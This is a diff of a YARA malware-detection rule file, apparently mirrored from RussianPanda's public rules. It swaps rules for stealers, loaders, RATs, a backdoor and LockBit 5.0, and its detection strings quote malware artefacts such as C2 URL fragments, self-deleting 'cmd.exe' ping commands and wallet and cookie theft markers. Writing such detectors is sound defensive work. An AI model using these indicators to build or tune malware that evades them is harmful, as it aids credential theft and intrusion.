-		hash = "d53ce8c0a8a89c2e3eb080849da8b1c47eaac614248fc55d03706dd5b4e10bdd"
-		logic_hash = "ffaec6b19dd4385cd1bc156fdfde39a356367c7fba4135c48a8de62a18a78576"
+		hash = "e4faa7d7a098414449abffb210fd874798207ee9d27643c8088676ff429b56b7"
+		logic_hash = "8c761a98369436ffbe1379152461753778985a42ae656567018b47c71af7d866"
 		score = 75
-		quality = 85
+		quality = 81
 		tags = "FILE"
 
 	strings:
-		$s1 = {F7 EA C1 FA 04 8B C2 C1 E8 1F 03 C2 8B 55 ?? 0F BE C0 8A CA 6B C0 ?? 2A C8 80 C1}
-		$s2 = {F7 E2 C1 EA 04 0F BE C2 8B 55 ?? 8A CA 6B C0 ?? 2A C8 80 C1 ?? 30 8C 15}
+		$s1 = {47 5A 69 70 53 74 72 65 61 6D}
+		$s2 = {41 73 73 65 6D 62 6C 79 4C 6F 61 64 65 72 00 43 6F 73 74 75 72 61}
+		$s3 = {44 65 66 6C 61 74 65 53 74 72 65 61 6D}
+		$cnct = {72 ?? ?? 00 70 28 FB 00 00 0A 72 ?? ?? 00 70 28 ?? 00 00 0A}
+		$nr1 = {7B 00 31 00 31 00 31 00 31 00 31 00 2D 00 32 00 32 00 32 00 32 00 32 00 2D 00 34 00 30 00 30 00 30 00 31 00 2D 00 30 00 30 00 30 00 30 00 31 00 7D}
+		$nr2 = {7B 00 31 00 31 00 31 00 31 00 31 00 2D 00 32 00 32 00 32 00 32 00 32 00 2D 00 34 00 30 00 30 00 30 00 31 00 2D 00 30 00 30 00 30 00 30 00 32 00 7D}
+		$nr3 = {7B 00 31 00 31 00 31 00 31 00 31 00 2D 00 32 00 32 00 32 00 32 00 32 00 2D 00 32 00 30 00 30 00 30 00 31 00 2D 00 30 00 30 00 30 00 30 00 32 00 7D}
+		$nr4 = {7B 00 31 00 31 00 31 00 31 00 31 00 2D 00 32 00 32 00 32 00 32 00 32 00 2D 00 32 00 30 00 30 00 30 00 31 00 2D 00 30 00 30 00 30 00 30 00 31 00 7D}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and #s1 > 3 and #s2 > 3 and filesize < 500KB
+		filesize < 5MB and all of ( $s* ) and dotnet.number_of_resources > 4 and dotnet.number_of_resources < 6 and 2 of ( $nr* ) and dotnet.assembly_refs [ 1 ] . name contains "protobuf-net" and #cnct > 5
 }
-rule RUSSIANPANDA_Aurorastealer_1
+
+rule RUSSIANPANDA_Swaetrat
 {
 	meta:
-		description = "Detects the Build/Group IDs if present / detects an unobfuscated AuroraStealer binary; tested on version 22.12.2022"
+		description = "Detects SwaetRAT"
 		author = "RussianPanda"
-		id = "1a94096f-c838-5272-856e-42efbd123a31"
-		date = "2023-02-07"
-		modified = "2023-05-05"
+		id = "e5238ae4-7ae3-505c-a3fd-ecf6be608fac"
+		date = "2023-11-27"
+		modified = "2023-11-27"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/AuroraStealer/AuroraStealer.yar#L1-L16"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/SwaetRAT/swaetrat.yar#L3-L19"
 		license_url = "N/A"
-		logic_hash = "7a9900266a0dfa7bf0ea91a0260a1d30bd7799a491fba87db083f4fea4115f2a"
-		score = 50
+		logic_hash = "4dc1107a34d678c3fa0939fab7986fe744ac246400823d08b1ab6db0942821da"
+		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$b1 = { 48 8D 0D ?? ?? 04 00 E8 ?? ?? EF FF }
-		$go = "Go build ID"
-		$machineid = "MachineGuid"
+		$s2 = "Pong"
+		$s3 = "ReadData"
+		$s4 = "DeskDrop" wide
+		$s5 = "OfflineGet" wide
 
 	condition:
-		all of them
+		all of ( $s* ) and pe.imports ( "mscoree.dll" )
 }
-rule RUSSIANPANDA_Aurorastealer_March_2023
+
+rule RUSSIANPANDA_Bandit_Stealer : FILE
 {
 	meta:
-		description = "Detects an unobfuscated AuroraStealer March update binary"
+		description = "Detects the latest build of Bandit Stealer"
 		author = "RussianPanda"
-		id = "a115de7a-bff7-5bb0-b83f-f66a29bbcf3f"
-		date = "2023-03-23"
+		id = "ed61177d-d70d-5062-8703-f2f2b9d63751"
+		date = "2023-05-05"
 		modified = "2023-05-05"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/AuroraStealer/Aurora_March_2023.yar#L1-L15"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/BanditStealer/bandit_stealer.yar#L3-L21"
 		license_url = "N/A"
-		logic_hash = "d74d2843a03e826f334ce3c5eb10cc2b43cfd832174769e5d067fb877abe13a0"
-		score = 75
+		logic_hash = "304bf05a58d5b762ffe078457739188692f4f7109db929418832c4379b21ae72"
+		score = 50
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$b1 = { 48 8D 0D ?? ?? 05 00 E8 ?? ?? EF FF }
-		$ftp = "FOUND FTP"
+		$s1 = {48 8D 35 ?? ?? B6 FF 48 8D BE DB ?? ?? FF 48 8D 87 AC ?? ?? 00 FF 30 C7 00 ?? ?? ?? ?? 50 57 31 DB 31 C9}
+		$s2 = {48 FF C0 88 17 83 E9 01 8A 10 48 8D 7F 01 75 F0}
 
 	condition:
-		all of them
+		all of ( $s* ) and ( uint16( 0 ) == 0x5A4D or uint32( 0 ) == 0x4464c457f ) and pe.sections [ 0 ] . name contains "UPX0" and pe.sections [ 1 ] . name contains "UPX1" and pe.sections [ 0 ] . characteristics & pe.SECTION_MEM_EXECUTE and pe.sections [ 0 ] . characteristics & pe.SECTION_MEM_WRITE and pe.sections [ 1 ] . characteristics & pe.SECTION_MEM_EXECUTE and pe.sections [ 1 ] . characteristics & pe.SECTION_MEM_WRITE
 }
 rule RUSSIANPANDA_Susp_Obf_Py_Marshal_Module : FILE
 {
@@ -167318,6 +167232,32 @@ rule RUSSIANPANDA_Susp_Obf_Py_Marshal_Module : FILE
 	condition:
 		$s1 and any of ( $t* ) and filesize < 2MB
 }
+rule RUSSIANPANDA_Golang_Base64_Enc : FILE
+{
+	meta:
+		description = "Detects Base64 Encoding and Decoding patterns in Golang binaries"
+		author = "RussianPanda"
+		id = "6330e005-9c67-5acd-9063-aa7e30e92f5f"
+		date = "2024-01-10"
+		modified = "2024-01-14"
+		reference = "https://unprotect.it/technique/base64/"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Techniques/golang_base64_enc.yar#L1-L18"
+		license_url = "N/A"
+		hash = "509a359b4d0cd993497671b91255c3775628b078cde31a32158c1bc3b2ce461c"
+		logic_hash = "72cf3ee948df9c4ce593f16a49397e79fdc5ecc3264b3685bbc54f60ed1278bd"
+		score = 75
+		quality = 83
+		tags = "FILE"
+
+	strings:
+		$s1 = {62 61 73 65 36 34 2e 53 74 64 45 6e 63 6f 64 69 6e 67 2e 45 6e 63 6f 64 65 54 6f 53 74 72 69 6e 67 28 [0-15] 29}
+		$s2 = {62 61 73 65 36 34 2e 53 74 64 45 6e 63 6f 64 69 6e 67 2e 44 65 63 6f 64 65 53 74 72 69 6e 67 28 [0-15] 29}
+		$s3 = {69 66 20 65 72 72 20 21 3D 20 6E 69 6C 20 7B}
+		$s4 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
+
+	condition:
+		all of ( $s* ) and uint16( 0 ) == 0x5A4D
+}
 rule RUSSIANPANDA_Check_Installed_Software : FILE
 {
 	meta:
@@ -167374,81 +167314,110 @@ rule RUSSIANPANDA_Win_Sus_Internetshortcutfile
 	condition:
 		all of ( $s* ) and any of ( $a* )
 }
-rule RUSSIANPANDA_Golang_Base64_Enc : FILE
+rule RUSSIANPANDA_Darkgate_Autoit
 {
 	meta:
-		description = "Detects Base64 Encoding and Decoding patterns in Golang binaries"
+		description = "Detects DarkGate AutoIT script"
 		author = "RussianPanda"
-		id = "6330e005-9c67-5acd-9063-aa7e30e92f5f"
-		date = "2024-01-10"
-		modified = "2024-01-14"
-		reference = "https://unprotect.it/technique/base64/"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Techniques/golang_base64_enc.yar#L1-L18"
+		id = "b30544b5-88c9-5a84-8582-f4f72b228f24"
+		date = "2024-01-26"
+		modified = "2024-01-26"
+		reference = "https://yara.readthedocs.io/en/stable/writingrules.html?highlight=xor"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/DarkGate/darkgate_autoit.yar#L1-L19"
 		license_url = "N/A"
-		hash = "509a359b4d0cd993497671b91255c3775628b078cde31a32158c1bc3b2ce461c"
-		logic_hash = "72cf3ee948df9c4ce593f16a49397e79fdc5ecc3264b3685bbc54f60ed1278bd"
+		hash = "e1803b01e3f187355dbeb87a0c91b76c"
+		logic_hash = "dda6726d09035d6f61ca331d18ed37f032c6f6a5ab88e1754a21587f4c79ac87"
 		score = 75
-		quality = 83
-		tags = "FILE"
+		quality = 85
+		tags = ""
 
 	strings:
-		$s1 = {62 61 73 65 36 34 2e 53 74 64 45 6e 63 6f 64 69 6e 67 2e 45 6e 63 6f 64 65 54 6f 53 74 72 69 6e 67 28 [0-15] 29}
-		$s2 = {62 61 73 65 36 34 2e 53 74 64 45 6e 63 6f 64 69 6e 67 2e 44 65 63 6f 64 65 53 74 72 69 6e 67 28 [0-15] 29}
-		$s3 = {69 66 20 65 72 72 20 21 3D 20 6E 69 6C 20 7B}
-		$s4 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
+		$h = "AU3!EA06"
+		$s1 = "just_test.txt" xor(0x01-0xff)
+		$s2 = "c:\\temp\\data.txt" xor(0x01-0xff)
+		$s3 = "test.txt" xor(0x01-0xff)
+		$s4 = "cc.txt" xor(0x01-0xff)
+		$s5 = "c:\\temp\\data.txt" xor(0x01-0xff)
+		$s6 = "uu.txt" xor(0x01-0xff)
 
 	condition:
-		all of ( $s* ) and uint16( 0 ) == 0x5A4D
+		3 of ( $s* ) and $h
 }
-
-rule RUSSIANPANDA_Andeloader
+rule RUSSIANPANDA_Win_Mal_Koistealer_PS
 {
 	meta:
-		description = "Detects Ande Loader"
+		description = "Detects KoiStealer PowerShell script"
 		author = "RussianPanda"
-		id = "c08d63b6-9fef-505d-9611-9dd0403c7c7c"
-		date = "2023-12-11"
-		modified = "2023-12-11"
+		id = "6dfdb39c-1b6a-5969-9c2d-e09869af6e0f"
+		date = "2024-04-04"
+		modified = "2024-04-04"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/AndeLoader/ande_loader.yar#L3-L18"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Koi/win_mal_KoiStealer_PS.yar#L1-L12"
 		license_url = "N/A"
-		logic_hash = "cd55153077e5cfbd84cbe5b062dbd842def245417acfea4ed6c2b1db702dcc81"
+		hash = "4f55be0b55ec67dfda42b88e9c743a2a"
+		logic_hash = "8a60a1d770eb4b5048762ddfd4657fdf7a430b09eb454ae5a5bb3103460907db"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = ""
 
 	strings:
-		$s1 = {59 61 6E 6F 41 74 74 72 69 62 75 74 65}
-		$s2 = "CreateShortcut" wide
-		$s3 = ".vbs" wide
+		$s1 = "index.php?id=$guid&subid="
+		$s2 = "$config"
 
 	condition:
-		3 of ( $s* ) and pe.imports ( "mscoree.dll" )
+		all of ( $s* )
 }
-rule RUSSIANPANDA_Whitesnakestealer : FILE
+rule RUSSIANPANDA_Win_Mal_Koi_Loader_Decrypted : FILE
 {
 	meta:
-		description = "Detects WhiteSnake Stealer XOR samples "
+		description = "Detects decrypted Koi Loader"
 		author = "RussianPanda"
-		id = "cfe168a6-cc2f-5cfe-985c-78b232dc2651"
-		date = "2023-07-04"
-		modified = "2023-12-11"
-		reference = "https://russianpanda.com/2023/07/04/WhiteSnake-Stealer-Malware-Analysis/"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/WhiteSnake-Stealer/WhiteSnake_xor.yar#L1-L15"
+		id = "71de93d3-5c9f-5994-a54d-d4455d500280"
+		date = "2024-04-04"
+		modified = "2024-04-04"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Koi/win_mal_Koi_loader_decrypted.yar#L1-L12"
 		license_url = "N/A"
-		logic_hash = "0bd0e250b8598be297296ecf6644d3bf649e3dc4598438325a0913afed04c819"
+		hash = "1901593e0299930d46b963866f33a93b"
+		logic_hash = "f73ada7185ff109afe1e186a0fb7b4420b3d0e04c93c7c5423243db97eb34e49"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {FE 0C 00 00 FE 09 00 00 FE 0C 02 00 6F ?? 00 00 0A FE 0C 03 00 61 D1 FE 0E 04 00 FE}
-		$s2 = {61 6e 61 6c 2e 6a 70 67}
+		$s1 = {73 00 64 00 32 00 2E 00 70 00 73 00 31 00}
+		$s2 = {25 00 74 00 65 00 6D 00 70 00 25 00 5C 00 25 00 70 00 61 00 74 00 68 00 73 00 25}
 
 	condition:
-		all of ( $s* ) and filesize < 600KB
+		uint16( 0 ) == 0x5A4D and all of ( $s* )
 }
-rule RUSSIANPANDA_Whitesnakestealer_1 : FILE
+rule RUSSIANPANDA_Win_Mal_Koi_Loader : FILE
+{
+	meta:
+		description = "Detects Koi Loader"
+		author = "RussianPanda"
+		id = "a608558d-97c8-5161-a6eb-29fd420458a8"
+		date = "2024-04-04"
+		modified = "2024-04-04"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Koi/win_mal_Koi_loader.yar#L1-L14"
+		license_url = "N/A"
+		hash = "47e208687c2fb40bdbaa17e368aaa1bd"
+		logic_hash = "4f909865c6d274804c3fa7f66822d7bea71bb93e7c6a422ebaf220df056ac095"
+		score = 75
+		quality = 85
+		tags = "FILE"
+
+	strings:
+		$s1 = {27 11 68 05}
+		$s2 = {15 B1 B3 09}
+		$s3 = {B5 96 AA 0D}
+		$s4 = {74 [0-10] C1 E9 18}
+
+	condition:
+		uint16( 0 ) == 0x5A4D and all of ( $s* )
+}
+rule RUSSIANPANDA_Whitesnakestealer : FILE
 {
 	meta:
 		description = "WhiteSnake Stealer"
@@ -167473,749 +167442,835 @@ rule RUSSIANPANDA_Whitesnakestealer_1 : FILE
 	condition:
 		all of ( $s* ) and filesize < 300KB
 }
-rule RUSSIANPANDA_Obfuscation_Powershell_Special_Chars
+rule RUSSIANPANDA_Whitesnakestealer_1 : FILE
 {
 	meta:
-		description = "Detects PowerShell special character obfuscation"
+		description = "Detects WhiteSnake Stealer XOR samples "
 		author = "RussianPanda"
-		id = "dd2d41d4-3431-5252-adf1-d537f3b8db7e"
-		date = "2024-01-12"
-		modified = "2024-02-02"
-		reference = "https://perl-users.jp/articles/advent-calendar/2010/sym/11"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/PowerShell Obfuscation/obfuscation_powershell_special_chars.yar#L1-L15"
+		id = "cfe168a6-cc2f-5cfe-985c-78b232dc2651"
+		date = "2023-07-04"
+		modified = "2023-12-11"
+		reference = "https://russianpanda.com/2023/07/04/WhiteSnake-Stealer-Malware-Analysis/"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/WhiteSnake-Stealer/WhiteSnake_xor.yar#L1-L15"
 		license_url = "N/A"
-		hash = "d77efad78ef3afc5426432597ba129141952719846bc5ccd058249bb23d8a905"
-		logic_hash = "4cc4ebffe7bf712b412a060536acc51d94381d24b46e5494195ae17482076cd6"
+		logic_hash = "0bd0e250b8598be297296ecf6644d3bf649e3dc4598438325a0913afed04c819"
 		score = 75
-		quality = 81
-		tags = ""
+		quality = 83
+		tags = "FILE"
 
 	strings:
-		$s1 = {7d 3d 2b 2b 24 7b}
-		$s2 = {24 28 20 20 29}
-		$s3 = {24 7B [1-10] 7D 20 20 2B 20 20 24}
-		$s4 = {24 7B [1-10] 7D 24 7B}
+		$s1 = {FE 0C 00 00 FE 09 00 00 FE 0C 02 00 6F ?? 00 00 0A FE 0C 03 00 61 D1 FE 0E 04 00 FE}
+		$s2 = {61 6e 61 6c 2e 6a 70 67}
 
 	condition:
-		2 of ( $s* )
+		all of ( $s* ) and filesize < 600KB
 }
-rule RUSSIANPANDA_Win_Mal_Koi_Loader : FILE
+rule RUSSIANPANDA_Win_Ransom_Lockbit5 : FILE
 {
 	meta:
-		description = "Detects Koi Loader"
+		description = "Detects LockBit 5.0"
 		author = "RussianPanda"
-		id = "a608558d-97c8-5161-a6eb-29fd420458a8"
-		date = "2024-04-04"
-		modified = "2024-04-04"
+		id = "bfe66503-fdd1-5a9a-9509-5b97efaabd9b"
+		date = "2025-09-15"
+		modified = "2025-09-15"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Koi/win_mal_Koi_loader.yar#L1-L14"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Ransomware/win_ransom_lockbit5.0.yar#L1-L15"
 		license_url = "N/A"
-		hash = "47e208687c2fb40bdbaa17e368aaa1bd"
-		logic_hash = "4f909865c6d274804c3fa7f66822d7bea71bb93e7c6a422ebaf220df056ac095"
+		hash = "7ea5afbc166c4e23498aa9747be81ceaf8dad90b8daa07a6e4644dc7c2277b82"
+		logic_hash = "579944626f576ce9771b0a7de40a5766221acd5db1ef4257a45314a99714067d"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {27 11 68 05}
-		$s2 = {15 B1 B3 09}
-		$s3 = {B5 96 AA 0D}
-		$s4 = {74 [0-10] C1 E9 18}
+		$s1 = {C6 41 0F 00 0F B6 ?? 33 ?? 89}
+		$s2 = {0F B6 ?? 0F C1 ?? 18 31}
+		$s3 = {83 ?? 02 83 ?? 0F D0 84 ?? ?? 00 00 00}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of ( $s* )
+		all of ( $s* ) and uint16( 0 ) == 0x5A4D and filesize < 1MB
 }
-rule RUSSIANPANDA_Win_Mal_Koistealer_PS
+rule RUSSIANPANDA_Aurorastealer_1
 {
 	meta:
-		description = "Detects KoiStealer PowerShell script"
+		description = "Detects the Build/Group IDs if present / detects an unobfuscated AuroraStealer binary; tested on version 22.12.2022"
 		author = "RussianPanda"
-		id = "6dfdb39c-1b6a-5969-9c2d-e09869af6e0f"
-		date = "2024-04-04"
-		modified = "2024-04-04"
+		id = "1a94096f-c838-5272-856e-42efbd123a31"
+		date = "2023-02-07"
+		modified = "2023-05-05"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Koi/win_mal_KoiStealer_PS.yar#L1-L12"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/AuroraStealer/AuroraStealer.yar#L1-L16"
 		license_url = "N/A"
-		hash = "4f55be0b55ec67dfda42b88e9c743a2a"
-		logic_hash = "8a60a1d770eb4b5048762ddfd4657fdf7a430b09eb454ae5a5bb3103460907db"
-		score = 75
+		logic_hash = "7a9900266a0dfa7bf0ea91a0260a1d30bd7799a491fba87db083f4fea4115f2a"
+		score = 50
 		quality = 85
 		tags = ""
 
 	strings:
-		$s1 = "index.php?id=$guid&subid="
-		$s2 = "$config"
+		$b1 = { 48 8D 0D ?? ?? 04 00 E8 ?? ?? EF FF }
+		$go = "Go build ID"
+		$machineid = "MachineGuid"
 
 	condition:
-		all of ( $s* )
+		all of them
 }
-rule RUSSIANPANDA_Win_Mal_Koi_Loader_Decrypted : FILE
+rule RUSSIANPANDA_Aurorastealer_March_2023
 {
 	meta:
-		description = "Detects decrypted Koi Loader"
+		description = "Detects an unobfuscated AuroraStealer March update binary"
 		author = "RussianPanda"
-		id = "71de93d3-5c9f-5994-a54d-d4455d500280"
-		date = "2024-04-04"
-		modified = "2024-04-04"
+		id = "a115de7a-bff7-5bb0-b83f-f66a29bbcf3f"
+		date = "2023-03-23"
+		modified = "2023-05-05"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/Koi/win_mal_Koi_loader_decrypted.yar#L1-L12"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/AuroraStealer/Aurora_March_2023.yar#L1-L15"
 		license_url = "N/A"
-		hash = "1901593e0299930d46b963866f33a93b"
-		logic_hash = "f73ada7185ff109afe1e186a0fb7b4420b3d0e04c93c7c5423243db97eb34e49"
+		logic_hash = "d74d2843a03e826f334ce3c5eb10cc2b43cfd832174769e5d067fb877abe13a0"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$s1 = {73 00 64 00 32 00 2E 00 70 00 73 00 31 00}
-		$s2 = {25 00 74 00 65 00 6D 00 70 00 25 00 5C 00 25 00 70 00 61 00 74 00 68 00 73 00 25}
+		$b1 = { 48 8D 0D ?? ?? 05 00 E8 ?? ?? EF FF }
+		$ftp = "FOUND FTP"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of ( $s* )
+		all of them
 }
-rule RUSSIANPANDA_Cowtunnel : FILE
+rule RUSSIANPANDA_Zinfoq : FILE
 {
 	meta:
-		description = "Detects CowTunnel"
+		description = "Detects ZinFoq implant"
 		author = "RussianPanda"
-		id = "dc9f8416-0f5b-51d8-ad13-46ebe40af13a"
+		id = "e88a2941-2e73-5dc4-8894-c03236c3a61e"
 		date = "2025-12-08"
-		modified = "2025-12-08"
+		modified = "2025-12-09"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/CowTunnel/linux_mal_CowTunnel.yar#L1-L13"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/ZinFoq/linux_mal_zinfoq.yar#L1-L13"
 		license_url = "N/A"
-		hash = "776850a1e6d6915e9bf35aa83554616129acd94e3a3f6673bd6ddaec530f4273"
-		logic_hash = "80c96d02e216331ec0b711ae1a1ee5fcf31df8847009afe23735abc3f8bd8ec9"
+		hash = "0f0f9c339fcc267ec3d560c7168c56f607232cbeb158cb02a0818720a54e72ce"
+		logic_hash = "e14d7968bc9752550924cd20d7e48622e97aeecd03975de91075cef9d677ab3f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = "cannot create proxy service, it should not happenned!"
-		$s2 = "[nss] encrypt_data"
-		$s3 = "[nss] decrypt_data"
+		$s1 = "_FlAg_UuId;;;;;;"
+		$s2 = "interactive_shell"
+		$s3 = "explorer_download"
 
 	condition:
 		uint32( 0 ) == 0x464c457f and all of them
 }
-rule RUSSIANPANDA_Win_Mal_Planetstealer : FILE
+rule RUSSIANPANDA_Darkvnc : FILE
 {
 	meta:
-		description = "Detects PlanetStealer"
+		description = "Detects DarkVNC"
 		author = "RussianPanda"
-		id = "f912066f-4151-5f83-8d34-6bffdf9e25e5"
-		date = "2024-03-04"
-		modified = "2024-03-24"
+		id = "dbc86ac8-5ea3-59a7-b3ab-68c603165720"
+		date = "2024-01-15"
+		modified = "2024-01-15"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/PlanetStealer/win_mal_PlanetStealer.yar#L1-L14"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/DarkVNC/darkvnc.yar#L1-L15"
 		license_url = "N/A"
-		logic_hash = "e1660d6fed4c48b45b40bd51fb52254c5b19ca6f1938b68f2344bde473820b86"
+		hash = "3c74dccd06605bcf527ffc27b3122959"
+		logic_hash = "1dd1246e0b22181706433f0cff9b231017e747d8faaa2db4cb9adefeab492ab7"
 		score = 75
-		quality = 79
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {48 8D 15 ?? ?? ?? 00 0F B6 34 10 0F B6 BC 04 ?? ?? 00 00 ?? ?? 40 88 ?? 04 ?? ?? 00 00 48 FF C0}
-		$s2 = {48 83 F8 ?? 7C DA}
-		$s3 = {72 75 6E 74 69 6D 65 2E 67 6F 62 75 66}
-		$s4 = {74 6F 74 61 6C 5F 77 61 6C 6C 65 74 73}
-		$s5 = {74 6F 74 61 6C 5F 63 6F 6F 6B 69 65 73}
+		$s1 = {66 89 84 24 ?? 00 00 00 B8 ?? 00 00 00}
+		$s2 = {66 31 14 41 48}
+		$s3 = "VncStopServer"
+		$s4 = "VncStartServer"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them and #s2 > 100 and #s1 > 100 and filesize < 20MB
+		uint16( 0 ) == 0x5A4D and 3 of them and filesize < 700KB
 }
-rule RUSSIANPANDA_Ghostgambit : FILE
+rule RUSSIANPANDA_Win_Mal_Mpxdropper : FILE
 {
 	meta:
-		description = "Detects GhostGambit dropper"
+		description = "Detects MpxDropper"
 		author = "RussianPanda"
-		id = "0348b9fa-59be-5f30-8ebc-f1e87cf98b07"
-		date = "2024-07-09"
-		modified = "2024-07-09"
+		id = "26ee0a12-c727-5953-8ebb-dd8a8d772561"
+		date = "2024-03-01"
+		modified = "2024-03-01"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/GhostGambit/GhostGambit.yar#L1-L14"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/MpxDropper/mal_win_MpxDropper.yar#L1-L11"
 		license_url = "N/A"
-		hash = "2b16c68d9bafbd2ecf3634d991d7c794"
-		logic_hash = "419efbea3c347d0ec9365c0c21cccb6f229f8c42d22a2bcfdf14854e7f83aea1"
+		hash = "3a44a45afbfe5fc7cdeb3723e05c4e892b079abdb7d1e8d6fc70496ef0a14d5d"
+		logic_hash = "e8d2672553c7f44e1cc177fad6596bd58b5c32a7541f91ce1207e6b21ef6e52d"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
 
 	strings:
-		$s1 = "/code32" ascii wide
-		$s2 = "/reg32" ascii wide
-		$s3 = "ZhuDongFangYu.exe" ascii wide
-		$s4 = "/c ping -n 4 127.0.0.1 > nul && del" ascii wide
+		$s1 = {43 3a 5c 55 73 65 72 73 5c 6d 70 78 31 36 5c 73 6f 75 72 63 65 5c 72 65 70 6f 73}
 
 	condition:
 		uint16( 0 ) == 0x5A4D and all of them
 }
-
-rule RUSSIANPANDA_Illyrianstealer : FILE
+rule RUSSIANPANDA_Supperbackdoor
 {
 	meta:
-		description = "Detects Illyrian Stealer"
+		description = "Detects Supper backdoor"
 		author = "RussianPanda"
-		id = "2f85e87c-6883-5f41-a37c-00f9e93f61bf"
-		date = "2024-01-08"
-		modified = "2024-01-08"
+		id = "bd2752c3-1072-5151-9bb9-dd094feb0772"
+		date = "2025-10-31"
+		modified = "2025-11-02"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/IllyrianStealer/illyrian_stealer.yar#L2-L18"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/dff551be45bf6382c3d31dea2e9105147ee32e79/VanillaTempest/win_mal_SupperBackdoor.yar#L1-L14"
 		license_url = "N/A"
-		hash = "fae0aed6173804e8c22027cbb0c121eedd927f16ea7e2b23662dbe6e016980e8"
-		logic_hash = "2012d401d3e7ce2d4d6ea12ed01a30b7d3e18f4ed47dbf70d43bae6c328960ea"
+		hash = "bf2ba1f30ef8ca6f9946f6ec21118eff3c3442590bbedea150e2d670e78ab986"
+		logic_hash = "85577822ecb065a32fe9c0c3ce2e2d7892c263e6a21afc56a9f0a1dbe5218abe"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$s1 = "get_TotalPhysicalMemory"
-		$s2 = "\\b(bitcoincash)[a-zA-HJ-NP-Z0-9]{36,54}\\b" wide
-		$s3 = "[Crypto]" wide
-		$s4 = "|Black|" wide
+		$s1 = "[DEBUG MAIN SOCKS] Starting Init SOCKS"
+		$s2 = "fail send data to target"
+		$s3 = "serv disconnect"
+		$s4 = "cmd.exe /C ping 1.1.1.1 -n 1 -w 3000"
 
 	condition:
-		all of ( $s* ) and filesize < 50KB and pe.imports ( "mscoree.dll" )
+		all of them
 }
